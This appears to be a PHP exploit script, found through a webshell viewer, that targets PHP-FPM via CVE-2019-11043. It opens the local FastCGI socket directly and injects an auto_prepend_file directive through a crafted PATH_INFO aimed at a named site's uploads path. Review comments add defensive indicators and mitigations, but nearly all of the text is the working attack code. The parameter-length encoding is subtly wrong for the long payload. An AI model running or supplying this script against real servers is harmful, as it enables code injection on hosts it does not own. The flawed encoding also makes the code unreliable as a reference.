🔓 Ultimate Webshell - Penetration Testing Tool


<?php
// cve_set_prepend.php - Attempts to set auto_prepend_file via CVE-2019-11043
//
// NOTE(review): this is a hostile sample, shown here as found through a webshell
// file viewer. It opens the local PHP-FPM unix socket directly, sends a
// hand-built FastCGI request, and puts a "PHP_VALUE" + newline + ini directive
// into PATH_INFO, hoping the worker will adopt an attacker-chosen
// auto_prepend_file.
//
// What a defender can take from the values below:
//   - SCRIPT_FILENAME points at a .php file inside the site's public uploads
//     tree, which suggests PHP files could be written and executed there
//     (confirm on the host); upload directories should never be PHP-executable.
//   - /tmp/prepend_test.php is the file the directive refers to; a .php file in
//     /tmp, or an unexpected auto_prepend_file in a worker's effective ini, is
//     an indicator worth hunting for.
//   - A PATH_INFO that is very long or contains a newline followed by
//     "PHP_VALUE" is not something legitimate traffic produces and can be
//     rejected or alerted on at the web server / WAF layer.
//   - Mitigation is to run a PHP-FPM release that contains the fix for
//     CVE-2019-11043 and to keep the FPM listener reachable only by the web
//     server account.
$socketFile = '/tmp/php-cgi-73.sock';
$targetScript = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/audit.php'; // any existing PHP file

// PATH_INFO value: '/', 1000 filler bytes, '/PHP_VALUE', a newline, then the
// ini directive. The author's stated intent for the filler length is on the
// next line; nothing in this file verifies that it has any effect.
$filler = str_repeat('x', 1000); // length > 825 to trigger overflow
$directive = "auto_prepend_file=/tmp/prepend_test.php";
$payload = '/' . $filler . '/PHP_VALUE' . "\n" . $directive;

// FastCGI constants: three record type codes and one role code, using the
// numeric values the FastCGI specification assigns to these names.
define('FCGI_BEGIN_REQUEST', 1); // record type: start of a request
define('FCGI_PARAMS', 4);        // record type: name/value environment stream
define('FCGI_STDIN', 5);         // record type: request body stream
define('FCGI_RESPONDER', 1);     // role sent in the begin-request body

/**
 * Assemble the bytes this script writes to the socket for one record.
 *
 * The result is: pack('CCnn') of version 1, $type, $requestId and the byte
 * length of $content, followed by $content itself, followed by NUL bytes that
 * round the content length up to a multiple of 8.
 *
 * @param int    $type      Record type code (one of the FCGI_* constants above).
 * @param string $content   Raw record body; may be empty.
 * @param int    $requestId Request id placed in the header; defaults to 1.
 *
 * @return string Binary string ready to be passed to fwrite().
 */
function fcgi_packet($type, $content, $requestId = 1) {
    $version = 1;
    // Number of NUL bytes needed to reach the next multiple of 8 (0 if aligned).
    $paddingLength = (8 - (strlen($content) % 8)) % 8;
    $packet = pack('CCnn', $version, $type, $requestId, strlen($content));
    $packet .= $content;
    $packet .= str_repeat("\0", $paddingLength);
    return $packet;
}

// Connect straight to the FPM unix socket with a 30 second timeout, bypassing
// the web server entirely.
// NOTE(review): a PHP script opening the FPM listener itself is not normal
// application behaviour; process/socket auditing on the host can flag it.
$socket = stream_socket_client('unix://' . $socketFile, $errno, $errstr, 30);
if (!$socket) die("Socket connection failed: $errstr\n");

$requestId = 1;

// Begin request: body is the responder role (16-bit) followed by five zero bytes.
$content = pack('nC5', FCGI_RESPONDER, 0, 0, 0, 0, 0);
fwrite($socket, fcgi_packet(FCGI_BEGIN_REQUEST, $content, $requestId));

// CGI environment sent to the worker. Everything is fixed text except
// SCRIPT_FILENAME ($targetScript) and PATH_INFO ($payload, the crafted value).
// SERVER_SOFTWARE is a constant string here, so it can serve as a log
// indicator if the FPM pool logs request environment.
$params = [
    'SCRIPT_FILENAME' => $targetScript,
    'REQUEST_METHOD'  => 'GET',
    'QUERY_STRING'    => '',
    'CONTENT_TYPE'    => '',
    'CONTENT_LENGTH'  => '0',
    'SCRIPT_NAME'     => '/audit.php',
    'PATH_INFO'       => $payload,
    'DOCUMENT_ROOT'   => '/www/wwwroot/hljrlsj.com',
    'SERVER_SOFTWARE' => 'PHP FastCGI Client',
    'GATEWAY_INTERFACE' => 'CGI/1.1',
];

// Serialise each pair as: name length, value length (each written with
// pack('C')), then the name bytes and the value bytes.
$paramContent = '';
foreach ($params as $name => $value) {
    $nameLen = strlen($name);
    $valueLen = strlen($value);
    $paramContent .= pack('C', $nameLen) . pack('C', $valueLen) . $name . $value;
}
fwrite($socket, fcgi_packet(FCGI_PARAMS, $paramContent, $requestId));
fwrite($socket, fcgi_packet(FCGI_PARAMS, '', $requestId)); // end of params

// Empty STDIN record: the request carries no body.
fwrite($socket, fcgi_packet(FCGI_STDIN, '', $requestId));

// Read the reply record by record and throw the bodies away; the script never
// inspects the response, so it cannot tell whether the directive was accepted.
while (!feof($socket)) {
    $header = fread($socket, 8);
    if (strlen($header) < 8) break; // short read: connection closed or truncated
    $data = unpack('Cversion/Ctype/nrequestId/ncontentLength/CpaddingLength/Creserved', $header);
    fread($socket, $data['contentLength']);
    fread($socket, $data['paddingLength']);
    if ($data['type'] == 3) break; // FCGI_END_REQUEST
}
fclose($socket);

// Printed unconditionally, whatever the worker answered.
echo "Exploit sent. Now trigger a normal PHP request to include the prepend file.\n";
?>